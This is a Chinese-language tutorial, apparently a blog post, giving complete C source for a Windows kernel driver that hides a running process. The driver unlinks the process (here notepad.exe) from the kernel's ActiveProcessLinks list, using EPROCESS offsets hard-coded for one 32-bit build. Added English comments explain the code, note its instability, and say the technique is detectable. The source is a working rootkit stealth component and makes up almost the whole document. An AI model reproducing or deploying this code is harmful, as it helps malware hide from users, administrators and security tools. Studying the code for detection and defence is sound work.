在windows内核模式下隐藏进程

进程隐藏之内核实现

1、在内核模式下,系统为每个进程维护了一个EPROCESS结构体,系统所有的进程是通过EPROCESS结构体中的一个ActiveProcessLinks指向的双端链表连接起来的,通过WinDbg内核调试工具就可以发现并获取其相对于EPROCESS结构体的地址(0x88),这样我们可以通过遍历该循环链表找到我们的目的进程将其链表的节点删除即可隐藏该进程。(EPROCESS中进程PID相对地址为0x84,进程名字相对地址为0x174)。

代码如下:

/****************************
   在内核模式下隐藏进程
      sky_2012.12.13
****************************/

#include 
/* ULONG is a 32-bit type; pointers are cast to it below (e.g. the
 * PsGetCurrentProcess() result in FindProcessEPROCESS), so this code
 * only makes sense for a 32-bit kernel. */
#define DWORD ULONG

/* Unload handler and the single dispatch routine used for CREATE/CLOSE. */
void DriverUnload(IN PDRIVER_OBJECT Driver_Object);
NTSTATUS HelloDDKDispatchRoutine(IN PDEVICE_OBJECT pDevObj,
								 IN PIRP pIrp);

/* Walk the ActiveProcessLinks list looking for a process whose image
 * name equals PsName (the original comment said "by PID"; the body
 * compares names). On a match *flg is set to 1 and the returned value is
 * the Blink of the matched entry, i.e. the address of the predecessor's
 * LIST_ENTRY, not an EPROCESS. Returns 0 and leaves *flg untouched when
 * the walk wraps around without a match. */
DWORD FindProcessEPROCESS(PANSI_STRING PsName, OUT int* flg);

/* Target image name, initialised in DriverEntry. */
ANSI_STRING Process_Name;

/*
 * DriverEntry - driver load routine.
 *
 * Installs HelloDDKDispatchRoutine for IRP_MJ_CREATE / IRP_MJ_CLOSE and
 * DriverUnload as the unload handler, then looks up the process named
 * "notepad.exe" with FindProcessEPROCESS and, if found, unlinks it from
 * the kernel's ActiveProcessLinks list (the DKOM process-hiding technique
 * the post describes).
 *
 * Driver_Object: driver object supplied by the I/O manager.
 * RegisterPath:  registry service path; unused here.
 *
 * Returns STATUS_SUCCESS unconditionally, whether or not the target was
 * found, so the driver stays loaded either way.
 *
 * NOTE(review): the list is modified without acquiring any lock that
 * serialises process creation/termination, and DriverUnload below does
 * not restore the list, so the modification outlives the driver. Both are
 * classic sources of bugchecks that make this kind of tampering visible.
 */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT Driver_Object,
					 IN PUNICODE_STRING RegisterPath)
{
	
	PLIST_ENTRY  pre_ActiveProcessLink;
	int flg = 0;                    /* set to 1 by FindProcessEPROCESS on a match */
	DWORD preprocess = 0x00000000;  /* predecessor's LIST_ENTRY address (see below) */
	CHAR *string1 = "notepad.exe";  /* hard-coded target image name */
	
	Driver_Object->MajorFunction[IRP_MJ_CREATE] = HelloDDKDispatchRoutine;
	Driver_Object->MajorFunction[IRP_MJ_CLOSE]  = HelloDDKDispatchRoutine;
	Driver_Object->DriverUnload = DriverUnload;
	
	/* Find the ActiveProcessLinks entry that precedes the target process.
	 * Despite the name, FindProcessEPROCESS returns the matched entry's
	 * Blink (a LIST_ENTRY address), which is what is cast below. */
	
	RtlInitAnsiString(&Process_Name,string1);


	preprocess = FindProcessEPROCESS(&Process_Name,&flg);

	
	/* Unlink the target: the predecessor skips over it, and the new
	 * successor points back at the predecessor. The target's own
	 * Flink/Blink are left pointing at its former neighbours, and no
	 * process-list lock is held while the two pointers are rewritten. */
	if(flg)
	{
		pre_ActiveProcessLink = (PLIST_ENTRY)(preprocess);
		pre_ActiveProcessLink->Flink = pre_ActiveProcessLink->Flink->Flink;
		pre_ActiveProcessLink->Flink->Blink = pre_ActiveProcessLink;
		KdPrint(("Delete Success!\n"));
	}
	else
	{
		KdPrint(("notepad.exe dos'nt exist!\n"));
	}
	
	return STATUS_SUCCESS;
}


/*
 * FindProcessEPROCESS - walk the ActiveProcessLinks ring, starting from
 * the current process, looking for an image name equal to PsName.
 *
 * PsName: ANSI image name to look for. RtlCompareString is called with
 *         FALSE as its CaseInSensitive argument, so the compare is
 *         case-sensitive.
 * flg:    set to 1 on a match; NOT written on the not-found path, so the
 *         caller must initialise it.
 *
 * Returns the Blink of the matched entry's ActiveProcessLinks (the address
 * of the predecessor's LIST_ENTRY), or 0 when the walk comes back to the
 * starting process without a match.
 *
 * NOTE(review): the field offsets 0x84 (PID), 0x88 (ActiveProcessLinks)
 * and 0x174 (image name) are the ones the post read from one specific
 * 32-bit build; on any other build they address different fields and the
 * walk dereferences garbage. The walk holds no lock, so an entry can be
 * freed while it is being read. From a defensive standpoint, raw offset
 * arithmetic into EPROCESS instead of documented APIs is itself an
 * indicator of DKOM-style tampering.
 */
DWORD FindProcessEPROCESS(PANSI_STRING PsName, OUT int* flg)
{
	ANSI_STRING CurName;
	PLIST_ENTRY   cut_ActiveProcessLink = 0x00000000;
	DWORD CUR_EPROCESS = 0x00000000;
	DWORD curent_id = 0;/* PID of the entry currently being examined */
	DWORD start_id =0;  /* PID of the process the walk started from */
	int count = 0;/* number of loop iterations */
	/* Start from whichever process context this driver is loading in. */
	CUR_EPROCESS = (DWORD)PsGetCurrentProcess();
	curent_id = *((DWORD*)(CUR_EPROCESS + 0x84));
	start_id = curent_id;

	/* RtlInitAnsiString scans for a NUL terminator; this assumes the
	 * image-name field is always NUL-terminated — worth verifying, since
	 * it is a short fixed-size buffer. */
	RtlInitAnsiString(&CurName,(char*)CUR_EPROCESS + 0x174);
	cut_ActiveProcessLink = (PLIST_ENTRY)(CUR_EPROCESS + 0x88);
	/* Starting process itself matches. */
	if(!RtlCompareString(PsName, &CurName,FALSE))
	{
		*flg = 1;
		return ((DWORD)(cut_ActiveProcessLink->Blink));
	}
	/* Follow Flink around the ring. cut_ActiveProcessLink points at the
	 * LIST_ENTRY inside each EPROCESS, hence the "- 0x88" to get back to
	 * the structure base before adding a field offset. */
	while(1)
	{
		count++;
		cut_ActiveProcessLink = cut_ActiveProcessLink->Flink;
		RtlInitAnsiString(&CurName,(char*)cut_ActiveProcessLink - 0x88 + 0x174);

		curent_id = *((DWORD*)((DWORD)cut_ActiveProcessLink - 0x88 + 0x84));
		if(!RtlCompareString(PsName,&CurName,FALSE))
		{
			*flg = 1;
			return ((DWORD)(cut_ActiveProcessLink->Blink));
		}
		/* Wrap-around check: count>=1 is always true here because count
		 * was just incremented, so the test reduces to "back at the
		 * starting PID". This branch is the only exit without a match;
		 * the loop never falls through to the end of the function. */
		else if (count>=1&&(start_id == curent_id))
		{
			KdPrint(("没有找到!\n"));
			return 0x00000000;
		}
	}
}

/* Default dispatch handler for IRP_MJ_CREATE / IRP_MJ_CLOSE.
 * Marks the IRP successful, completes it with no priority boost and
 * returns STATUS_SUCCESS. pDevObj is not used. */

NTSTATUS HelloDDKDispatchRoutine(IN PDEVICE_OBJECT pDevObj,
								 IN PIRP pIrp)
{
	KdPrint(("Enter HelloDDKDispatchRoutine\n"));
	/* Complete the IRP: record the status, then hand it back to the I/O manager. */
	pIrp->IoStatus.Status = STATUS_SUCCESS;
	IoCompleteRequest(pIrp, IO_NO_INCREMENT );
	KdPrint(("Leave HelloDDKDispatchRoutine\n"));
	return STATUS_SUCCESS;
}

/* Unload routine. Only logs; note that it does NOT undo the
 * ActiveProcessLinks modification made in DriverEntry. */
void DriverUnload(IN PDRIVER_OBJECT Driver_Object)
{
	(void)Driver_Object; /* unused */
	KdPrint(("DriverUnload!\n"));
}

